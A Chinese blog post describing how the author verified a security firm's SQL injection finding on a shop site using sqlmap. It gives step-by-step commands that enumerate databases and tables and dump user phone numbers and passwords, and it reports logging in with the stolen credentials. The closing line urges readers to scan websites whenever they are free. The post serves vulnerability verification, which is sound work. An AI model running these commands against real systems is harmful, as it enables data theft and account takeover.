扫描结果是安全公司反馈回来的,有很多安全方面的漏洞,其中有sql注入,XSS注入,宽字节跨站漏洞,Javascript框架库漏洞,MHTML脚本代码注入漏洞,永久cookie,cookie中缺少httponly属性,内部IP地址泄露等等很多问题,当然相应的也给出了验证的方式。
之前电脑上也安装了sqlmap,就说说我测试sql注入漏洞的一个过程。不知道是不是sqlmap不那么强大的缘故,安全公司反馈的sql注入有三个URL上存在sql注入,但是我用sqlmap去验证时,只扫描出一个url有sql注入,现在将我用sqlmap测出来这个做一个总结吧。
打开sqlmap之后就在dos命令框下输入命令,
python sqlmap.py -u "存在注入的URL" --batch
-u 参数表示url地址,--batch参数带上就不用在sqlmap执行时手动输入Y/N等参数了
执行结束之后,发现参数goods_id存在注入,直接执行命令获取到数据库
D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" --dbs
--dbs(前面是两个杠)表示获取所有的数据库
获取当前使用的数据库名
D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" --current-db
--current-db参数表示获取使用的数据库名
获取当前使用的数据库名.png
获取当前数据库登录使用的登录名
python sqlmap.py -u "存在注入的URL" --current-user
--current-user参数
获取当前使用的用户名.png
获取数据库的所有登录用户
python sqlmap.py -u "存在注入的URL" --users
获取数据库中的所有表
D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop --tables
-D 指定数据库名:前面的操作过程中已经获取了当前使用的数据库名了
--tables 参数表示获取表名
取货当前使用的数据库中所有的表名.png
根据获取的表名,查看你想要查看的表字段,这里我就查看下用户表,猜测是表名中带users字段的那些
D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop -T dsc_users --columns
-D 参数,指定数据库名
-T 参数,指定表名
--columns 列出表字段及类型
获取表中的所有字段及类型.png
根据表字段,爆出表字段值
D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop -T dsc_users -C "mobile_phone,nick_name,password,user_money,user_name" --dump --start 20 --stop 40
-D 指定数据库名
-T 指定表明
-C 指定要爆出的字段值
--dump参数,打印出内容
--start --stop 表示打印多少行到多少行,如果表数据量很大的话,长时间获取不到,可以加这个参数,先获取一些信息
爆出表中字段值.png
红色框中直接用户名和密码都打印出来了,简单加密的密码直接就被解密了,从爆出的结果看,数据库中字段存的时候,密码还是加密存储了。现在使用红色框中的手机号和密码,登录URL,直接就能登录成功。
安全测试还是要以实战为止,没事多去扫描网站测试,扫出来的安全漏洞,需要去验证是否是真的存在的漏洞还是误报了。
网友评论